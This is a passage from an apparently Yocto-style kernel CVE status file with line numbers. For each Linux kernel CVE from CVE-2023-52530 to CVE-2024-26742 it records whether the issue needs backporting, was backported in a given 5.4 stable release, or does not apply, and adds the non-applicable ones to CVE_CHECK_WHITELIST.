8456# CVE-2023-52530 needs backporting (fixed from 6.6rc5)
8457
8458# CVE-2023-52531 needs backporting (fixed from 6.6rc5)
8459
8460# CVE-2023-52532 needs backporting (fixed from 6.6rc5)
8461
8462# CVE-2023-52559 needs backporting (fixed from 6.6rc5)
8463
8464# fixed-version: only affects 5.16rc5 onwards
8465CVE_CHECK_WHITELIST += "CVE-2023-52560"
8466
8467# CVE-2023-52561 needs backporting (fixed from 6.6rc1)
8468
8469# fixed-version: only affects 6.0rc4 onwards
8470CVE_CHECK_WHITELIST += "CVE-2023-52562"
8471
8472# CVE-2023-52563 needs backporting (fixed from 6.6rc3)
8473
8474# fixed-version: only affects 6.5rc4 onwards
8475CVE_CHECK_WHITELIST += "CVE-2023-52564"
8476
8477# CVE-2023-52565 needs backporting (fixed from 6.6rc3)
8478
8479# cpe-stable-backport: Backported in 5.4.258
8480CVE_CHECK_WHITELIST += "CVE-2023-52566"
8481
8482# fixed-version: only affects 6.4rc1 onwards
8483CVE_CHECK_WHITELIST += "CVE-2023-52567"
8484
8485# CVE-2023-52568 needs backporting (fixed from 6.6rc4)
8486
8487# CVE-2023-52569 needs backporting (fixed from 6.6rc2)
8488
8489# fixed-version: only affects 6.1rc1 onwards
8490CVE_CHECK_WHITELIST += "CVE-2023-52570"
8491
8492# CVE-2023-52571 needs backporting (fixed from 6.6rc4)
8493
8494# CVE-2023-52572 needs backporting (fixed from 6.6rc3)
8495
8496# cpe-stable-backport: Backported in 5.4.258
8497CVE_CHECK_WHITELIST += "CVE-2023-52573"
8498
8499# cpe-stable-backport: Backported in 5.4.258
8500CVE_CHECK_WHITELIST += "CVE-2023-52574"
8501
8502# fixed-version: only affects 6.5rc6 onwards
8503CVE_CHECK_WHITELIST += "CVE-2023-52575"
8504
8505# fixed-version: only affects 5.13rc1 onwards
8506CVE_CHECK_WHITELIST += "CVE-2023-52576"
8507
8508# fixed-version: only affects 6.6rc1 onwards
8509CVE_CHECK_WHITELIST += "CVE-2023-52577"
8510
8511# cpe-stable-backport: Backported in 5.4.258
8512CVE_CHECK_WHITELIST += "CVE-2023-52578"
8513
8514# fixed-version: only affects 5.12rc1 onwards
8515CVE_CHECK_WHITELIST += "CVE-2023-52580"
8516
8517# fixed-version: only affects 6.5rc6 onwards
8518CVE_CHECK_WHITELIST += "CVE-2023-52581"
8519
8520# fixed-version: only affects 5.13rc1 onwards
8521CVE_CHECK_WHITELIST += "CVE-2023-52582"
8522
8523# cpe-stable-backport: Backported in 5.4.269
8524CVE_CHECK_WHITELIST += "CVE-2023-52583"
8525
8526# CVE-2023-52584 needs backporting (fixed from 6.8rc1)
8527
8528# CVE-2023-52585 needs backporting (fixed from 6.8rc1)
8529
8530# CVE-2023-52586 needs backporting (fixed from 6.8rc1)
8531
8532# cpe-stable-backport: Backported in 5.4.269
8533CVE_CHECK_WHITELIST += "CVE-2023-52587"
8534
8535# CVE-2023-52588 needs backporting (fixed from 6.8rc1)
8536
8537# CVE-2023-52589 needs backporting (fixed from 6.8rc1)
8538
8539# CVE-2023-52590 needs backporting (fixed from 6.8rc1)
8540
8541# CVE-2023-52591 needs backporting (fixed from 6.8rc1)
8542
8543# CVE-2023-52593 needs backporting (fixed from 6.8rc1)
8544
8545# cpe-stable-backport: Backported in 5.4.269
8546CVE_CHECK_WHITELIST += "CVE-2023-52594"
8547
8548# cpe-stable-backport: Backported in 5.4.269
8549CVE_CHECK_WHITELIST += "CVE-2023-52595"
8550
8551# CVE-2023-52596 needs backporting (fixed from 6.8rc1)
8552
8553# cpe-stable-backport: Backported in 5.4.269
8554CVE_CHECK_WHITELIST += "CVE-2023-52597"
8555
8556# cpe-stable-backport: Backported in 5.4.269
8557CVE_CHECK_WHITELIST += "CVE-2023-52598"
8558
8559# cpe-stable-backport: Backported in 5.4.269
8560CVE_CHECK_WHITELIST += "CVE-2023-52599"
8561
8562# cpe-stable-backport: Backported in 5.4.269
8563CVE_CHECK_WHITELIST += "CVE-2023-52600"
8564
8565# cpe-stable-backport: Backported in 5.4.269
8566CVE_CHECK_WHITELIST += "CVE-2023-52601"
8567
8568# cpe-stable-backport: Backported in 5.4.269
8569CVE_CHECK_WHITELIST += "CVE-2023-52602"
8570
8571# cpe-stable-backport: Backported in 5.4.269
8572CVE_CHECK_WHITELIST += "CVE-2023-52603"
8573
8574# cpe-stable-backport: Backported in 5.4.269
8575CVE_CHECK_WHITELIST += "CVE-2023-52604"
8576
8577# cpe-stable-backport: Backported in 5.4.269
8578CVE_CHECK_WHITELIST += "CVE-2023-52606"
8579
8580# cpe-stable-backport: Backported in 5.4.269
8581CVE_CHECK_WHITELIST += "CVE-2023-52607"
8582
8583# fixed-version: only affects 5.7rc1 onwards
8584CVE_CHECK_WHITELIST += "CVE-2023-52608"
8585
8586# cpe-stable-backport: Backported in 5.4.268
8587CVE_CHECK_WHITELIST += "CVE-2023-52609"
8588
8589# CVE-2023-52610 needs backporting (fixed from 6.8rc1)
8590
8591# fixed-version: only affects 6.4rc1 onwards
8592CVE_CHECK_WHITELIST += "CVE-2023-52611"
8593
8594# cpe-stable-backport: Backported in 5.4.268
8595CVE_CHECK_WHITELIST += "CVE-2023-52612"
8596
8597# fixed-version: only affects 6.6rc1 onwards
8598CVE_CHECK_WHITELIST += "CVE-2023-52613"
8599
8600# CVE-2023-52614 needs backporting (fixed from 6.8rc1)
8601
8602# cpe-stable-backport: Backported in 5.4.269
8603CVE_CHECK_WHITELIST += "CVE-2023-52615"
8604
8605# fixed-version: only affects 5.10rc1 onwards
8606CVE_CHECK_WHITELIST += "CVE-2023-52616"
8607
8608# cpe-stable-backport: Backported in 5.4.269
8609CVE_CHECK_WHITELIST += "CVE-2023-52617"
8610
8611# CVE-2023-52618 needs backporting (fixed from 6.8rc1)
8612
8613# cpe-stable-backport: Backported in 5.4.269
8614CVE_CHECK_WHITELIST += "CVE-2023-52619"
8615
8616# CVE-2023-52620 needs backporting (fixed from 6.4)
8617
8618# CVE-2023-52621 needs backporting (fixed from 6.8rc1)
8619
8620# cpe-stable-backport: Backported in 5.4.269
8621CVE_CHECK_WHITELIST += "CVE-2023-52622"
8622
8623# cpe-stable-backport: Backported in 5.4.269
8624CVE_CHECK_WHITELIST += "CVE-2023-52623"
8625
8626# CVE-2023-52624 needs backporting (fixed from 6.8rc1)
8627
8628# CVE-2023-52625 needs backporting (fixed from 6.8rc1)
8629
8630# fixed-version: only affects 6.7rc2 onwards
8631CVE_CHECK_WHITELIST += "CVE-2023-52626"
8632
8633# fixed-version: only affects 5.6rc1 onwards
8634CVE_CHECK_WHITELIST += "CVE-2023-52627"
8635
8636# CVE-2023-52628 needs backporting (fixed from 6.6rc1)
8637
8638# CVE-2023-52629 needs backporting (fixed from 6.6rc1)
8639
8640# fixed-version: only affects 5.10rc1 onwards
8641CVE_CHECK_WHITELIST += "CVE-2023-52630"
8642
8643# fixed-version: only affects 5.15rc1 onwards
8644CVE_CHECK_WHITELIST += "CVE-2023-52631"
8645
8646# CVE-2023-52632 needs backporting (fixed from 6.8rc1)
8647
8648# CVE-2023-52633 needs backporting (fixed from 6.8rc1)
8649
8650# CVE-2023-52634 needs backporting (fixed from 6.8rc1)
8651
8652# CVE-2023-52635 needs backporting (fixed from 6.8rc1)
8653
8654# fixed-version: only affects 6.6rc1 onwards
8655CVE_CHECK_WHITELIST += "CVE-2023-52636"
8656
8657# cpe-stable-backport: Backported in 5.4.269
8658CVE_CHECK_WHITELIST += "CVE-2023-52637"
8659
8660# CVE-2023-52638 needs backporting (fixed from 6.8rc5)
8661
8662# CVE-2023-52639 needs backporting (fixed from 6.8rc4)
8663
8664# CVE-2023-52640 needs backporting (fixed from 6.8rc4)
8665
8666# CVE-2023-52641 needs backporting (fixed from 6.8rc4)
8667
8668# fixed-version: only affects 6.1rc1 onwards
8669CVE_CHECK_WHITELIST += "CVE-2023-5345"
8670
8671# fixed-version: only affects 6.2 onwards
8672CVE_CHECK_WHITELIST += "CVE-2023-5633"
8673
8674# cpe-stable-backport: Backported in 5.4.259
8675CVE_CHECK_WHITELIST += "CVE-2023-5717"
8676
8677# fixed-version: only affects 6.2rc1 onwards
8678CVE_CHECK_WHITELIST += "CVE-2023-5972"
8679
8680# fixed-version: only affects 5.15rc1 onwards
8681CVE_CHECK_WHITELIST += "CVE-2023-6039"
8682
8683# cpe-stable-backport: Backported in 5.4.267
8684CVE_CHECK_WHITELIST += "CVE-2023-6040"
8685
8686# fixed-version: only affects 6.6rc3 onwards
8687CVE_CHECK_WHITELIST += "CVE-2023-6111"
8688
8689# cpe-stable-backport: Backported in 5.4.263
8690CVE_CHECK_WHITELIST += "CVE-2023-6121"
8691
8692# fixed-version: only affects 5.7rc7 onwards
8693CVE_CHECK_WHITELIST += "CVE-2023-6176"
8694
8695# fixed-version: only affects 6.6rc1 onwards
8696CVE_CHECK_WHITELIST += "CVE-2023-6200"
8697
8698# CVE-2023-6238 has no known resolution
8699
8700# CVE-2023-6240 has no known resolution
8701
8702# cpe-stable-backport: Backported in 5.4.273
8703CVE_CHECK_WHITELIST += "CVE-2023-6270"
8704
8705# cpe-stable-backport: Backported in 5.4.268
8706CVE_CHECK_WHITELIST += "CVE-2023-6356"
8707
8708# fixed-version: only affects 6.1rc1 onwards
8709CVE_CHECK_WHITELIST += "CVE-2023-6531"
8710
8711# CVE-2023-6535 has no known resolution
8712
8713# cpe-stable-backport: Backported in 5.4.268
8714CVE_CHECK_WHITELIST += "CVE-2023-6536"
8715
8716# CVE-2023-6546 needs backporting (fixed from 6.5rc7)
8717
8718# CVE-2023-6560 needs backporting (fixed from 6.7rc4)
8719
8720# cpe-stable-backport: Backported in 5.4.266
8721CVE_CHECK_WHITELIST += "CVE-2023-6606"
8722
8723# CVE-2023-6610 needs backporting (fixed from 6.7rc7)
8724
8725# fixed-version: only affects 5.11rc1 onwards
8726CVE_CHECK_WHITELIST += "CVE-2023-6622"
8727
8728# fixed-version: only affects 6.7rc1 onwards
8729CVE_CHECK_WHITELIST += "CVE-2023-6679"
8730
8731# fixed-version: only affects 5.6rc1 onwards
8732CVE_CHECK_WHITELIST += "CVE-2023-6817"
8733
8734# cpe-stable-backport: Backported in 5.4.268
8735CVE_CHECK_WHITELIST += "CVE-2023-6915"
8736
8737# cpe-stable-backport: Backported in 5.4.264
8738CVE_CHECK_WHITELIST += "CVE-2023-6931"
8739
8740# cpe-stable-backport: Backported in 5.4.263
8741CVE_CHECK_WHITELIST += "CVE-2023-6932"
8742
8743# cpe-stable-backport: Backported in 5.4.273
8744CVE_CHECK_WHITELIST += "CVE-2023-7042"
8745
8746# cpe-stable-backport: Backported in 5.4.235
8747CVE_CHECK_WHITELIST += "CVE-2023-7192"
8748
8749# fixed-version: only affects 6.5rc6 onwards
8750CVE_CHECK_WHITELIST += "CVE-2024-0193"
8751
8752# cpe-stable-backport: Backported in 5.4.269
8753CVE_CHECK_WHITELIST += "CVE-2024-0340"
8754
8755# fixed-version: only affects 6.2rc1 onwards
8756CVE_CHECK_WHITELIST += "CVE-2024-0443"
8757
8758# fixed-version: only affects 5.15rc1 onwards
8759CVE_CHECK_WHITELIST += "CVE-2024-0562"
8760
8761# CVE-2024-0564 has no known resolution
8762
8763# CVE-2024-0565 needs backporting (fixed from 6.7rc6)
8764
8765# fixed-version: only affects 6.4rc1 onwards
8766CVE_CHECK_WHITELIST += "CVE-2024-0582"
8767
8768# cpe-stable-backport: Backported in 5.4.263
8769CVE_CHECK_WHITELIST += "CVE-2024-0584"
8770
8771# cpe-stable-backport: Backported in 5.4.269
8772CVE_CHECK_WHITELIST += "CVE-2024-0607"
8773
8774# fixed-version: only affects 5.13rc1 onwards
8775CVE_CHECK_WHITELIST += "CVE-2024-0639"
8776
8777# fixed-version: only affects 5.5rc1 onwards
8778CVE_CHECK_WHITELIST += "CVE-2024-0641"
8779
8780# cpe-stable-backport: Backported in 5.4.267
8781CVE_CHECK_WHITELIST += "CVE-2024-0646"
8782
8783# cpe-stable-backport: Backported in 5.4.243
8784CVE_CHECK_WHITELIST += "CVE-2024-0775"
8785
8786# cpe-stable-backport: Backported in 5.4.271
8787CVE_CHECK_WHITELIST += "CVE-2024-0841"
8788
8789# fixed-version: only affects 5.13rc1 onwards
8790CVE_CHECK_WHITELIST += "CVE-2024-1085"
8791
8792# cpe-stable-backport: Backported in 5.4.269
8793CVE_CHECK_WHITELIST += "CVE-2024-1086"
8794
8795# CVE-2024-1151 needs backporting (fixed from 6.8rc5)
8796
8797# CVE-2024-1312 needs backporting (fixed from 6.5rc4)
8798
8799# CVE-2024-21803 has no known resolution
8800
8801# CVE-2024-2193 has no known resolution
8802
8803# cpe-stable-backport: Backported in 5.4.273
8804CVE_CHECK_WHITELIST += "CVE-2024-22099"
8805
8806# CVE-2024-22386 has no known resolution
8807
8808# fixed-version: only affects 5.15rc1 onwards
8809CVE_CHECK_WHITELIST += "CVE-2024-22705"
8810
8811# cpe-stable-backport: Backported in 5.4.255
8812CVE_CHECK_WHITELIST += "CVE-2024-23196"
8813
8814# CVE-2024-23307 needs backporting (fixed from 6.9rc1)
8815
8816# CVE-2024-23848 has no known resolution
8817
8818# cpe-stable-backport: Backported in 5.4.269
8819CVE_CHECK_WHITELIST += "CVE-2024-23849"
8820
8821# fixed-version: only affects 5.9rc1 onwards
8822CVE_CHECK_WHITELIST += "CVE-2024-23850"
8823
8824# CVE-2024-23851 needs backporting (fixed from 6.8rc3)
8825
8826# CVE-2024-24855 needs backporting (fixed from 6.5rc2)
8827
8828# CVE-2024-24857 has no known resolution
8829
8830# CVE-2024-24858 has no known resolution
8831
8832# CVE-2024-24859 has no known resolution
8833
8834# CVE-2024-24860 needs backporting (fixed from 6.8rc1)
8835
8836# CVE-2024-24861 needs backporting (fixed from 6.9rc1)
8837
8838# CVE-2024-24864 has no known resolution
8839
8840# CVE-2024-25739 has no known resolution
8841
8842# CVE-2024-25740 has no known resolution
8843
8844# CVE-2024-25741 has no known resolution
8845
8846# CVE-2024-25744 needs backporting (fixed from 6.7rc5)
8847
8848# fixed-version: only affects 6.5rc4 onwards
8849CVE_CHECK_WHITELIST += "CVE-2024-26581"
8850
8851# fixed-version: only affects 6.0rc1 onwards
8852CVE_CHECK_WHITELIST += "CVE-2024-26582"
8853
8854# fixed-version: only affects 5.7 onwards
8855CVE_CHECK_WHITELIST += "CVE-2024-26583"
8856
8857# CVE-2024-26584 needs backporting (fixed from 6.8rc5)
8858
8859# CVE-2024-26585 needs backporting (fixed from 6.8rc5)
8860
8861# CVE-2024-26586 needs backporting (fixed from 6.8rc1)
8862
8863# fixed-version: only affects 6.6rc1 onwards
8864CVE_CHECK_WHITELIST += "CVE-2024-26587"
8865
8866# fixed-version: only affects 6.1rc3 onwards
8867CVE_CHECK_WHITELIST += "CVE-2024-26588"
8868
8869# CVE-2024-26589 needs backporting (fixed from 6.8rc1)
8870
8871# fixed-version: only affects 5.16rc1 onwards
8872CVE_CHECK_WHITELIST += "CVE-2024-26590"
8873
8874# fixed-version: only affects 5.13rc1 onwards
8875CVE_CHECK_WHITELIST += "CVE-2024-26591"
8876
8877# CVE-2024-26592 needs backporting (fixed from 6.8rc1)
8878
8879# cpe-stable-backport: Backported in 5.4.269
8880CVE_CHECK_WHITELIST += "CVE-2024-26593"
8881
8882# CVE-2024-26594 needs backporting (fixed from 6.8rc1)
8883
8884# CVE-2024-26595 needs backporting (fixed from 6.8rc1)
8885
8886# fixed-version: only affects 6.1rc1 onwards
8887CVE_CHECK_WHITELIST += "CVE-2024-26596"
8888
8889# cpe-stable-backport: Backported in 5.4.268
8890CVE_CHECK_WHITELIST += "CVE-2024-26597"
8891
8892# cpe-stable-backport: Backported in 5.4.269
8893CVE_CHECK_WHITELIST += "CVE-2024-26598"
8894
8895# fixed-version: only affects 5.17rc1 onwards
8896CVE_CHECK_WHITELIST += "CVE-2024-26599"
8897
8898# cpe-stable-backport: Backported in 5.4.269
8899CVE_CHECK_WHITELIST += "CVE-2024-26600"
8900
8901# fixed-version: only affects 5.11rc1 onwards
8902CVE_CHECK_WHITELIST += "CVE-2024-26601"
8903
8904# cpe-stable-backport: Backported in 5.4.269
8905CVE_CHECK_WHITELIST += "CVE-2024-26602"
8906
8907# fixed-version: only affects 5.14rc1 onwards
8908CVE_CHECK_WHITELIST += "CVE-2024-26603"
8909
8910# fixed-version: only affects 6.6rc1 onwards
8911CVE_CHECK_WHITELIST += "CVE-2024-26604"
8912
8913# fixed-version: only affects 6.7 onwards
8914CVE_CHECK_WHITELIST += "CVE-2024-26605"
8915
8916# cpe-stable-backport: Backported in 5.4.269
8917CVE_CHECK_WHITELIST += "CVE-2024-26606"
8918
8919# CVE-2024-26607 needs backporting (fixed from 6.8rc2)
8920
8921# fixed-version: only affects 5.15rc1 onwards
8922CVE_CHECK_WHITELIST += "CVE-2024-26608"
8923
8924# fixed-version: only affects 5.5rc1 onwards
8925CVE_CHECK_WHITELIST += "CVE-2024-26610"
8926
8927# fixed-version: only affects 6.6rc1 onwards
8928CVE_CHECK_WHITELIST += "CVE-2024-26611"
8929
8930# fixed-version: only affects 5.17rc1 onwards
8931CVE_CHECK_WHITELIST += "CVE-2024-26612"
8932
8933# CVE-2024-26614 needs backporting (fixed from 6.8rc2)
8934
8935# cpe-stable-backport: Backported in 5.4.269
8936CVE_CHECK_WHITELIST += "CVE-2024-26615"
8937
8938# fixed-version: only affects 6.4rc1 onwards
8939CVE_CHECK_WHITELIST += "CVE-2024-26616"
8940
8941# fixed-version: only affects 6.7rc1 onwards
8942CVE_CHECK_WHITELIST += "CVE-2024-26617"
8943
8944# fixed-version: only affects 6.5rc7 onwards
8945CVE_CHECK_WHITELIST += "CVE-2024-26618"
8946
8947# fixed-version: only affects 6.7rc5 onwards
8948CVE_CHECK_WHITELIST += "CVE-2024-26619"
8949
8950# fixed-version: only affects 6.0rc1 onwards
8951CVE_CHECK_WHITELIST += "CVE-2024-26620"
8952
8953# fixed-version: only affects 6.7 onwards
8954CVE_CHECK_WHITELIST += "CVE-2024-26621"
8955
8956# CVE-2024-26622 needs backporting (fixed from 6.8rc7)
8957
8958# CVE-2024-26623 needs backporting (fixed from 6.8rc3)
8959
8960# cpe-stable-backport: Backported in 5.4.269
8961CVE_CHECK_WHITELIST += "CVE-2024-26625"
8962
8963# fixed-version: only affects 6.8rc1 onwards
8964CVE_CHECK_WHITELIST += "CVE-2024-26626"
8965
8966# CVE-2024-26627 needs backporting (fixed from 6.8rc3)
8967
8968# fixed-version: only affects 5.19rc1 onwards
8969CVE_CHECK_WHITELIST += "CVE-2024-26629"
8970
8971# fixed-version: only affects 6.5rc1 onwards
8972CVE_CHECK_WHITELIST += "CVE-2024-26630"
8973
8974# fixed-version: only affects 5.13rc1 onwards
8975CVE_CHECK_WHITELIST += "CVE-2024-26631"
8976
8977# fixed-version: only affects 5.17rc1 onwards
8978CVE_CHECK_WHITELIST += "CVE-2024-26632"
8979
8980# cpe-stable-backport: Backported in 5.4.268
8981CVE_CHECK_WHITELIST += "CVE-2024-26633"
8982
8983# fixed-version: only affects 6.6rc7 onwards
8984CVE_CHECK_WHITELIST += "CVE-2024-26634"
8985
8986# cpe-stable-backport: Backported in 5.4.269
8987CVE_CHECK_WHITELIST += "CVE-2024-26635"
8988
8989# cpe-stable-backport: Backported in 5.4.269
8990CVE_CHECK_WHITELIST += "CVE-2024-26636"
8991
8992# fixed-version: only affects 6.7 onwards
8993CVE_CHECK_WHITELIST += "CVE-2024-26637"
8994
8995# fixed-version: only affects 5.19rc1 onwards
8996CVE_CHECK_WHITELIST += "CVE-2024-26638"
8997
8998# fixed-version: only affects 6.8rc1 onwards
8999CVE_CHECK_WHITELIST += "CVE-2024-26639"
9000
9001# CVE-2024-26640 needs backporting (fixed from 6.8rc3)
9002
9003# CVE-2024-26641 needs backporting (fixed from 6.8rc3)
9004
9005# CVE-2024-26642 needs backporting (fixed from 6.8)
9006
9007# fixed-version: only affects 6.5rc6 onwards
9008CVE_CHECK_WHITELIST += "CVE-2024-26643"
9009
9010# CVE-2024-26644 needs backporting (fixed from 6.8rc2)
9011
9012# cpe-stable-backport: Backported in 5.4.269
9013CVE_CHECK_WHITELIST += "CVE-2024-26645"
9014
9015# CVE-2024-26646 needs backporting (fixed from 6.8rc1)
9016
9017# CVE-2024-26647 needs backporting (fixed from 6.8rc1)
9018
9019# CVE-2024-26648 needs backporting (fixed from 6.8rc1)
9020
9021# fixed-version: only affects 6.3rc1 onwards
9022CVE_CHECK_WHITELIST += "CVE-2024-26649"
9023
9024# CVE-2024-26650 needs backporting (fixed from 6.8rc2)
9025
9026# cpe-stable-backport: Backported in 5.4.273
9027CVE_CHECK_WHITELIST += "CVE-2024-26651"
9028
9029# fixed-version: only affects 6.4rc1 onwards
9030CVE_CHECK_WHITELIST += "CVE-2024-26652"
9031
9032# fixed-version: only affects 6.7rc1 onwards
9033CVE_CHECK_WHITELIST += "CVE-2024-26653"
9034
9035# CVE-2024-26654 needs backporting (fixed from 6.9rc2)
9036
9037# CVE-2024-26655 needs backporting (fixed from 6.9rc2)
9038
9039# CVE-2024-26656 needs backporting (fixed from 6.9rc1)
9040
9041# fixed-version: only affects 6.7rc1 onwards
9042CVE_CHECK_WHITELIST += "CVE-2024-26657"
9043
9044# CVE-2024-26658 needs backporting (fixed from 6.8rc1)
9045
9046# CVE-2024-26659 needs backporting (fixed from 6.8rc3)
9047
9048# fixed-version: only affects 5.11rc1 onwards
9049CVE_CHECK_WHITELIST += "CVE-2024-26660"
9050
9051# fixed-version: only affects 5.9rc1 onwards
9052CVE_CHECK_WHITELIST += "CVE-2024-26661"
9053
9054# fixed-version: only affects 5.9rc1 onwards
9055CVE_CHECK_WHITELIST += "CVE-2024-26662"
9056
9057# cpe-stable-backport: Backported in 5.4.269
9058CVE_CHECK_WHITELIST += "CVE-2024-26663"
9059
9060# cpe-stable-backport: Backported in 5.4.269
9061CVE_CHECK_WHITELIST += "CVE-2024-26664"
9062
9063# fixed-version: only affects 5.9rc1 onwards
9064CVE_CHECK_WHITELIST += "CVE-2024-26665"
9065
9066# fixed-version: only affects 6.5rc1 onwards
9067CVE_CHECK_WHITELIST += "CVE-2024-26666"
9068
9069# fixed-version: only affects 5.19rc1 onwards
9070CVE_CHECK_WHITELIST += "CVE-2024-26667"
9071
9072# CVE-2024-26668 needs backporting (fixed from 6.8rc2)
9073
9074# CVE-2024-26669 needs backporting (fixed from 6.8rc2)
9075
9076# fixed-version: only affects 6.6rc5 onwards
9077CVE_CHECK_WHITELIST += "CVE-2024-26670"
9078
9079# cpe-stable-backport: Backported in 5.4.269
9080CVE_CHECK_WHITELIST += "CVE-2024-26671"
9081
9082# CVE-2024-26672 needs backporting (fixed from 6.8rc1)
9083
9084# cpe-stable-backport: Backported in 5.4.269
9085CVE_CHECK_WHITELIST += "CVE-2024-26673"
9086
9087# fixed-version: only affects 6.4rc1 onwards
9088CVE_CHECK_WHITELIST += "CVE-2024-26674"
9089
9090# cpe-stable-backport: Backported in 5.4.269
9091CVE_CHECK_WHITELIST += "CVE-2024-26675"
9092
9093# CVE-2024-26676 needs backporting (fixed from 6.8rc4)
9094
9095# CVE-2024-26677 needs backporting (fixed from 6.8rc4)
9096
9097# fixed-version: only affects 6.7rc1 onwards
9098CVE_CHECK_WHITELIST += "CVE-2024-26678"
9099
9100# cpe-stable-backport: Backported in 5.4.269
9101CVE_CHECK_WHITELIST += "CVE-2024-26679"
9102
9103# fixed-version: only affects 5.5rc1 onwards
9104CVE_CHECK_WHITELIST += "CVE-2024-26680"
9105
9106# fixed-version: only affects 6.0rc1 onwards
9107CVE_CHECK_WHITELIST += "CVE-2024-26681"
9108
9109# fixed-version: only affects 6.7rc1 onwards
9110CVE_CHECK_WHITELIST += "CVE-2024-26682"
9111
9112# fixed-version: only affects 6.7rc1 onwards
9113CVE_CHECK_WHITELIST += "CVE-2024-26683"
9114
9115# cpe-stable-backport: Backported in 5.4.269
9116CVE_CHECK_WHITELIST += "CVE-2024-26684"
9117
9118# cpe-stable-backport: Backported in 5.4.269
9119CVE_CHECK_WHITELIST += "CVE-2024-26685"
9120
9121# CVE-2024-26686 needs backporting (fixed from 6.8rc4)
9122
9123# CVE-2024-26687 needs backporting (fixed from 6.8rc5)
9124
9125# cpe-stable-backport: Backported in 5.4.271
9126CVE_CHECK_WHITELIST += "CVE-2024-26688"
9127
9128# CVE-2024-26689 needs backporting (fixed from 6.8rc4)
9129
9130# fixed-version: only affects 6.6rc1 onwards
9131CVE_CHECK_WHITELIST += "CVE-2024-26690"
9132
9133# CVE-2024-26691 needs backporting (fixed from 6.8rc5)
9134
9135# fixed-version: only affects 6.3rc1 onwards
9136CVE_CHECK_WHITELIST += "CVE-2024-26692"
9137
9138# fixed-version: only affects 6.4rc1 onwards
9139CVE_CHECK_WHITELIST += "CVE-2024-26693"
9140
9141# fixed-version: only affects 6.4rc1 onwards
9142CVE_CHECK_WHITELIST += "CVE-2024-26694"
9143
9144# fixed-version: only affects 6.0rc1 onwards
9145CVE_CHECK_WHITELIST += "CVE-2024-26695"
9146
9147# cpe-stable-backport: Backported in 5.4.269
9148CVE_CHECK_WHITELIST += "CVE-2024-26696"
9149
9150# cpe-stable-backport: Backported in 5.4.269
9151CVE_CHECK_WHITELIST += "CVE-2024-26697"
9152
9153# fixed-version: only affects 5.8rc1 onwards
9154CVE_CHECK_WHITELIST += "CVE-2024-26698"
9155
9156# CVE-2024-26699 needs backporting (fixed from 6.8rc5)
9157
9158# CVE-2024-26700 needs backporting (fixed from 6.8rc4)
9159
9160# cpe-stable-backport: Backported in 5.4.269
9161CVE_CHECK_WHITELIST += "CVE-2024-26702"
9162
9163# fixed-version: only affects 6.5rc1 onwards
9164CVE_CHECK_WHITELIST += "CVE-2024-26703"
9165
9166# cpe-stable-backport: Backported in 5.4.269
9167CVE_CHECK_WHITELIST += "CVE-2024-26704"
9168
9169# fixed-version: only affects 6.6rc2 onwards
9170CVE_CHECK_WHITELIST += "CVE-2024-26705"
9171
9172# CVE-2024-26706 needs backporting (fixed from 6.8rc3)
9173
9174# fixed-version: only affects 5.9rc1 onwards
9175CVE_CHECK_WHITELIST += "CVE-2024-26707"
9176
9177# fixed-version: only affects 6.2rc1 onwards
9178CVE_CHECK_WHITELIST += "CVE-2024-26708"
9179
9180# fixed-version: only affects 6.7rc1 onwards
9181CVE_CHECK_WHITELIST += "CVE-2024-26709"
9182
9183# fixed-version: only affects 6.8rc1 onwards
9184CVE_CHECK_WHITELIST += "CVE-2024-26710"
9185
9186# fixed-version: only affects 6.2rc1 onwards
9187CVE_CHECK_WHITELIST += "CVE-2024-26711"
9188
9189# CVE-2024-26712 needs backporting (fixed from 6.8rc5)
9190
9191# CVE-2024-26713 needs backporting (fixed from 6.8rc5)
9192
9193# fixed-version: only affects 5.15rc1 onwards
9194CVE_CHECK_WHITELIST += "CVE-2024-26714"
9195
9196# CVE-2024-26715 needs backporting (fixed from 6.8rc3)
9197
9198# fixed-version: only affects 6.5rc1 onwards
9199CVE_CHECK_WHITELIST += "CVE-2024-26716"
9200
9201# fixed-version: only affects 5.12rc1 onwards
9202CVE_CHECK_WHITELIST += "CVE-2024-26717"
9203
9204# fixed-version: only affects 5.9rc1 onwards
9205CVE_CHECK_WHITELIST += "CVE-2024-26718"
9206
9207# CVE-2024-26719 needs backporting (fixed from 6.8rc3)
9208
9209# cpe-stable-backport: Backported in 5.4.269
9210CVE_CHECK_WHITELIST += "CVE-2024-26720"
9211
9212# fixed-version: only affects 6.7rc1 onwards
9213CVE_CHECK_WHITELIST += "CVE-2024-26721"
9214
9215# fixed-version: only affects 6.7rc5 onwards
9216CVE_CHECK_WHITELIST += "CVE-2024-26722"
9217
9218# fixed-version: only affects 6.1rc1 onwards
9219CVE_CHECK_WHITELIST += "CVE-2024-26723"
9220
9221# fixed-version: only affects 6.7rc1 onwards
9222CVE_CHECK_WHITELIST += "CVE-2024-26724"
9223
9224# fixed-version: only affects 6.7rc1 onwards
9225CVE_CHECK_WHITELIST += "CVE-2024-26725"
9226
9227# CVE-2024-26726 needs backporting (fixed from 6.8rc5)
9228
9229# fixed-version: only affects 5.9rc1 onwards
9230CVE_CHECK_WHITELIST += "CVE-2024-26727"
9231
9232# fixed-version: only affects 6.7rc1 onwards
9233CVE_CHECK_WHITELIST += "CVE-2024-26728"
9234
9235# fixed-version: only affects 6.7rc1 onwards
9236CVE_CHECK_WHITELIST += "CVE-2024-26729"
9237
9238# fixed-version: only affects 6.6rc1 onwards
9239CVE_CHECK_WHITELIST += "CVE-2024-26730"
9240
9241# fixed-version: only affects 6.4rc4 onwards
9242CVE_CHECK_WHITELIST += "CVE-2024-26731"
9243
9244# fixed-version: only affects 6.7rc1 onwards
9245CVE_CHECK_WHITELIST += "CVE-2024-26732"
9246
9247# CVE-2024-26733 needs backporting (fixed from 6.8rc6)
9248
9249# fixed-version: only affects 6.3rc1 onwards
9250CVE_CHECK_WHITELIST += "CVE-2024-26734"
9251
9252# cpe-stable-backport: Backported in 5.4.270
9253CVE_CHECK_WHITELIST += "CVE-2024-26735"
9254
9255# cpe-stable-backport: Backported in 5.4.270
9256CVE_CHECK_WHITELIST += "CVE-2024-26736"
9257
9258# fixed-version: only affects 5.15rc1 onwards
9259CVE_CHECK_WHITELIST += "CVE-2024-26737"
9260
9261# CVE-2024-26738 needs backporting (fixed from 6.8rc6)
9262
9263# CVE-2024-26739 needs backporting (fixed from 6.8rc6)
9264
9265# CVE-2024-26740 needs backporting (fixed from 6.8rc6)
9266
9267# fixed-version: only affects 6.1rc1 onwards
9268CVE_CHECK_WHITELIST += "CVE-2024-26741"
9269
9270# fixed-version: only affects 6.0rc1 onwards
9271CVE_CHECK_WHITELIST += "CVE-2024-26742"
9272
